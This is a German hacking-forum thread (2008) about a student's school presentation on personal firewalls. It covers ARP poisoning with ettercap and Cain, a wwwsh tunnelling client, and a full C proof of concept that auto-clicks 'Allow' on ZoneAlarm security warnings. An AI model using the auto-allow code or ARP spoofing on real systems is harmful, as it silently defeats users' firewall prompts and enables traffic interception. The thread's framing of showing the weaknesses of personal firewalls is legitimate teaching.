[HaBo]

Huggy · 10.03.08, 10:34

Hi!

Ich habe bald ein Referat über Firewalls, worauf ich mich intensiv vorbereite :D
Video zum Referat hab ich schon , jetzt hab ich noch die Idee eines "Live Experiments" (The next uri geller *wink*)... Naja es soll eben ein live versuch sein, allerdings ohne erfolg. Ich will also nicht unbedingt in ein System (wir haben mehrere laptops, hätt einen Angreifer (mein pc) und ein Opfer (pc des mit-referenten)).
eindringen, sondern Nur verschiedene Fehlermeldungen von einer Firewall (wir präsentieren ZoneAlarm und Sygate Personal Firewall) hervorrufen.

Dazu wollen wir eben verschiedene Attacken (portscan usw) vom Angreif pc an den Opfer Pc durchführen.

Könnt ihr mir Methoden / vll sogar tools geben, mti denen wir das erreichen?

Mfg

Huggy =)

Banur · 10.03.08, 10:37

Ich weiß nicht mehr obs bei ZoneAlarm war oder bei einem anderen, aber ich glaub das die Angriffe in einer History eingetragen wurden. Vielleicht könntet ihr die zeigen.

Anzeige

- Anzeige -

Huggy · 10.03.08, 10:53

Ja, sowohl Sygate als auch Zonelarm loggen.. aber wir wollen ja verschiedene Alarm-meldungen zeigen :-)

**xeno** · 10.03.08, 12:45

zu dem thema kann ich nur den folgenden vortrag beim ccc empfehlen:
http://www.ulm.ccc.de/ChaosSeminar/2...onal_Firewalls

Huggy · 10.03.08, 13:38

Super! Sowohl pdf als auch mp4 eigenen sich echt wunderbar

Werd sowieso mehr auf Software als auf Hardwarefirewall eingehen, weil für Brutto Normalverbraucher ohne Router... ihr wisst ja

??: Wir wollen jetzt noch ein Arp-Poisoning durchführen, um eben die Schwachstellen von Firewalls zu zeigen (hab gehört die erkennen das nicht? ).

Jetzt haben wir ind er SChule aber ein auf Switche-basierendes LAN, und ich finde weder mit ettercap noch mit Cain andere Hosts im Netzwerk

Gibts irgendeine Methode, dieses Projekt doch durchzuführen ? Schlimmstenfalls müsst ich von zuhause einen Hub mitbringen, da solllte es doch funktionieren?

ODer geht's auch in einem wie oben beschriebenen Lan? Ich mein anpingen kann ich ja alle :baby:

Mfg

??2: kk hatte vergessen, den promiscius mode auszuschalten -_-
jetzt finde ich so 5-6 hosts, in meinem testnetzwerk sind aaber 15 :/
Und sobald ich mit cain oder ettercap nach hosts scanne, ist mein ganzes Internet weg..dann muss ich rebooten

Und wie finde ich alle hosts?

Eydeet · 11.03.08, 17:41

Das mit dem ARP-Poisoning sollte eigentlich funktionieren. Du empfängst keine Daten vom Switch, weil dieser einfach keine Pakete an dich weiterleitet, die nicht für dich bestimmt sind. Durch das ARP-Poisoning erreichst du aber, dass das Opfer seine Pakete an DICH statt an das Ziel schickt.

Übrigens, ich hab mir mal 'nen Spaß daraus gemacht, das AutoKlick-Beispiel für ZoneAlarm umzuschreiben. Das ganze ist POC-Code (die Abfrage blinkt noch kurz auf), aber an sich funktioniert es. Das wäre vielleicht auch 'ne Demonstration wert

.

zonealarm-autoklick.c

xrayn · 11.03.08, 18:12

Ich wuerde an deiner Stelle den Vortag nicht darauf hinauslaufen lassen, dass das Publikum sich am Ende mit PersonalFirewalls sicherer fuehlt. Vielmehr solltest du ihnen beibringen, dass es vor irgendwelches SK schuetzt, aber wenn es jemand wirklich drauf anlegt, ist auch eine pfw kein Hinderniss: https://www.rootkit.com/newsread.php?newsid=849

KlausSchiefer · 11.03.08, 18:27

Zitat:

Werd sowieso mehr auf Software als auf Hardwarefirewall eingehen, weil für Brutto Normalverbraucher ohne Router... ihr wisst ja

Aber bevor du so vor deiner Klasse argumentierst. Es GIBT keine Hardware Firewalls.
Das sind nichts anderes als kleine "PCs" auf denen ein Betriebssystem mit Packetfilter
läuft. Hardware Firewalls sind ein Hirngespinst von IT Marketingprofis

Nenn sie dann lieber "dedizierte" Firewall Rechner/Computer.

Prinzipiell gibt es keinen Unterschied zwischen einer Netgear Firewall mit IPFilter
und einem Windows 2003 Server mit seiner Firewall.

Zumindest kannst Du mit einer solchen Darstellung noch ein paar "A-ha" Effekte kassieren

Huggy · 12.03.08, 07:24

ja, dass hat sich halt so eingebürgert :/
Blödes marketing

Danke, für das Zonealarm script, sicher auch hilfreich!
Für den "echten" Bösewicht wäre "immer zulassen" oder "Nicht mehr nachfragen" auch praktisch

ob man das so zeigen kann weiß ich net, ich glaub ich zeigs einmal so & dreh zuhaus n video davon dass ich dann @zeitlupe abstell.

Der Ziel des Vortrags ist ja, dass man PFW skeptisch gegenüber steht :-)

Noch wer eine Idee, warum ich keine Netzwerkverbindung / IP mehr zugewiesen bekomme sobald ich mit CAIN / Ettercap nach Hosts scanne? (Beide finden aber nur 5-7, im netzwerk sind aber 15+)...

Danke euch

so jetzt schau ich mal dass ich das script compiled bekomm, hab ja garkeinen c Compiler mehr

NeonZero · 12.03.08, 08:11

Zitat:

Original von Huggy
Der Ziel des Vortrags ist ja, dass man PFW skeptisch gegenüber steht :-)

Schau mal hier: Desktop-Firewall im HaBo-Wiki

Bye, nz

Huggy · 12.03.08, 08:52

Hab ich schon als lesezeichen gehabt, aber danke

KlausSchiefer · 12.03.08, 14:18

Zitat:

Der Ziel des Vortrags ist ja, dass man PFW skeptisch gegenüber steht :-)

Das Ziel sollte besser sein, das man WEISS warum man der einen oder anderen PFW nicht blind vertrauen sollte

Huggy · 12.03.08, 15:10

Wer skeptisch ist vertraut nicht blind *Hoffnungslos zu argumentieren versuch*

Hat irgendwer eine Idee warum ich @ Arp-Spoofing nicht alle hosts finde & Netzwerkverbindung verliere? Sowohl zuhause im WLAN als auch @ testnetzwerk

??: habe probleme beim compilen des wwwsh clienten, den ich gerne ausführen würde..
Kann mir vll. wer den clienten (Server läuft

) compilen?

http://blog.copton.net/articles/pfw-.../wwwsh.tar.bz2

Hab noch nie mit c(#/++) gearbeitet und wenn ich wie nach anleitung beschrieben den Compiler auf die MAKE file hetze, sagt er "MAKE Ok, nothing to do?" und beendet sich..aber keine .exe :/ hab schon 2 compiler probiert, keiner war das gelbe vom Ei

Anzeige

- Anzeige -

10.03.08, 10:34	#1 (permalink)
Huggy Registriert seit: 07.04.06 Likes: 0	Firewall Referat - Meldung erzwingen! Anzeige Hi! Ich habe bald ein Referat über Firewalls, worauf ich mich intensiv vorbereite :D Video zum Referat hab ich schon , jetzt hab ich noch die Idee eines "Live Experiments" (The next uri geller wink)... Naja es soll eben ein live versuch sein, allerdings ohne erfolg. Ich will also nicht unbedingt in ein System (wir haben mehrere laptops, hätt einen Angreifer (mein pc) und ein Opfer (pc des mit-referenten)). eindringen, sondern Nur verschiedene Fehlermeldungen von einer Firewall (wir präsentieren ZoneAlarm und Sygate Personal Firewall) hervorrufen. Dazu wollen wir eben verschiedene Attacken (portscan usw) vom Angreif pc an den Opfer Pc durchführen. Könnt ihr mir Methoden / vll sogar tools geben, mti denen wir das erreichen? Mfg Huggy =)

10.03.08, 12:45	#4 (permalink)
xeno Moderator Registriert seit: 09.09.04 Likes: 76	zu dem thema kann ich nur den folgenden vortrag beim ccc empfehlen: http://www.ulm.ccc.de/ChaosSeminar/2...onal_Firewalls __________________ http://www.thehappy.de/~xeno/ http://www.blogthon.de/

11.03.08, 17:41	#6 (permalink)
Eydeet Registriert seit: 14.04.06 Likes: 4	Das mit dem ARP-Poisoning sollte eigentlich funktionieren. Du empfängst keine Daten vom Switch, weil dieser einfach keine Pakete an dich weiterleitet, die nicht für dich bestimmt sind. Durch das ARP-Poisoning erreichst du aber, dass das Opfer seine Pakete an DICH statt an das Ziel schickt. Übrigens, ich hab mir mal 'nen Spaß daraus gemacht, das AutoKlick-Beispiel für ZoneAlarm umzuschreiben. Das ganze ist POC-Code (die Abfrage blinkt noch kurz auf), aber an sich funktioniert es. Das wäre vielleicht auch 'ne Demonstration wert . zonealarm-autoklick.c Code: #include <windows.h> int main() { while (1) { // finde das Fenster HWND win = FindWindowEx(0, 0, 0, "ZoneAlarm-Sicherheitswarnung"); if (win == 0 \|\| IsWindowVisible(win) == 0) { Sleep(100); continue; } // wähle "Zulassen" aus HWND button = FindWindowEx(win, NULL, NULL, "Zu&lassen"); if (button == 0) { MessageBoxEx(NULL, "Kann Zulassen-Button nicht finden!", "ZAAK", MB_OK, 0); } HWND prevForegroundWindow = GetForegroundWindow(); SetForegroundWindow(button); SendMessage(button, WM_SETFOCUS, 0, 0); keybd_event(VK_SPACE, 0, 0, 0); keybd_event(VK_SPACE, 0, KEYEVENTF_KEYUP, 0); SetForegroundWindow(prevForegroundWindow); } return 0; }

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln

Ähnliche Themen
Thema	Autor	Forum	Antworten	Letzter Beitrag
Ruhezustand immer erzwingen.	Rothkegel	Windows	2	22.10.09 18:52
drucken erzwingen?	_D4rk_	Windows	0	21.11.06 16:02
Datei-Zugriff erzwingen ?	root	Windows	12	15.07.06 00:10
Umbruch erzwingen	k00ky	(Web-) Design und webbasierte Sprachen	2	10.05.06 23:56
RPM deinstall erzwingen	the-me	Linux/UNIX	6	25.09.05 20:39

10.03.08, 10:37	#2 (permalink)
Banur Registriert seit: 15.09.06 Likes: 0	Ich weiß nicht mehr obs bei ZoneAlarm war oder bei einem anderen, aber ich glaub das die Angriffe in einer History eingetragen wurden. Vielleicht könntet ihr die zeigen.

10.03.08, 10:53	#3 (permalink)
Huggy Themenstarter Registriert seit: 07.04.06 Likes: 0	Ja, sowohl Sygate als auch Zonelarm loggen.. aber wir wollen ja verschiedene Alarm-meldungen zeigen :-)

10.03.08, 13:38	#5 (permalink)
Huggy Themenstarter Registriert seit: 07.04.06 Likes: 0	Super! Sowohl pdf als auch mp4 eigenen sich echt wunderbar Werd sowieso mehr auf Software als auf Hardwarefirewall eingehen, weil für Brutto Normalverbraucher ohne Router... ihr wisst ja ??: Wir wollen jetzt noch ein Arp-Poisoning durchführen, um eben die Schwachstellen von Firewalls zu zeigen (hab gehört die erkennen das nicht? ). Jetzt haben wir ind er SChule aber ein auf Switche-basierendes LAN, und ich finde weder mit ettercap noch mit Cain andere Hosts im Netzwerk Gibts irgendeine Methode, dieses Projekt doch durchzuführen ? Schlimmstenfalls müsst ich von zuhause einen Hub mitbringen, da solllte es doch funktionieren? ODer geht's auch in einem wie oben beschriebenen Lan? Ich mein anpingen kann ich ja alle :baby: Mfg ??2: kk hatte vergessen, den promiscius mode auszuschalten -_- jetzt finde ich so 5-6 hosts, in meinem testnetzwerk sind aaber 15 :/ Und sobald ich mit cain oder ettercap nach hosts scanne, ist mein ganzes Internet weg..dann muss ich rebooten Und wie finde ich alle hosts?

11.03.08, 18:12	#7 (permalink)
xrayn Member of Honour Registriert seit: 05.03.08 Likes: 246	Ich wuerde an deiner Stelle den Vortag nicht darauf hinauslaufen lassen, dass das Publikum sich am Ende mit PersonalFirewalls sicherer fuehlt. Vielmehr solltest du ihnen beibringen, dass es vor irgendwelches SK schuetzt, aber wenn es jemand wirklich drauf anlegt, ist auch eine pfw kein Hinderniss: https://www.rootkit.com/newsread.php?newsid=849

12.03.08, 07:24	#9 (permalink)
Huggy Themenstarter Registriert seit: 07.04.06 Likes: 0	ja, dass hat sich halt so eingebürgert :/ Blödes marketing Danke, für das Zonealarm script, sicher auch hilfreich! Für den "echten" Bösewicht wäre "immer zulassen" oder "Nicht mehr nachfragen" auch praktisch ob man das so zeigen kann weiß ich net, ich glaub ich zeigs einmal so & dreh zuhaus n video davon dass ich dann @zeitlupe abstell. Der Ziel des Vortrags ist ja, dass man PFW skeptisch gegenüber steht :-) Noch wer eine Idee, warum ich keine Netzwerkverbindung / IP mehr zugewiesen bekomme sobald ich mit CAIN / Ettercap nach Hosts scanne? (Beide finden aber nur 5-7, im netzwerk sind aber 15+)... Danke euch so jetzt schau ich mal dass ich das script compiled bekomm, hab ja garkeinen c Compiler mehr

12.03.08, 08:52	#11 (permalink)
Huggy Themenstarter Registriert seit: 07.04.06 Likes: 0	Hab ich schon als lesezeichen gehabt, aber danke

12.03.08, 15:10	#13 (permalink)
Huggy Themenstarter Registriert seit: 07.04.06 Likes: 0	Wer skeptisch ist vertraut nicht blind Hoffnungslos zu argumentieren versuch Hat irgendwer eine Idee warum ich @ Arp-Spoofing nicht alle hosts finde & Netzwerkverbindung verliere? Sowohl zuhause im WLAN als auch @ testnetzwerk ??: habe probleme beim compilen des wwwsh clienten, den ich gerne ausführen würde.. Kann mir vll. wer den clienten (Server läuft ) compilen? http://blog.copton.net/articles/pfw-.../wwwsh.tar.bz2 Hab noch nie mit c(#/++) gearbeitet und wenn ich wie nach anleitung beschrieben den Compiler auf die MAKE file hetze, sagt er "MAKE Ok, nothing to do?" und beendet sich..aber keine .exe :/ hab schon 2 compiler probiert, keiner war das gelbe vom Ei

[HaBo]

Firewall Referat - Meldung erzwingen!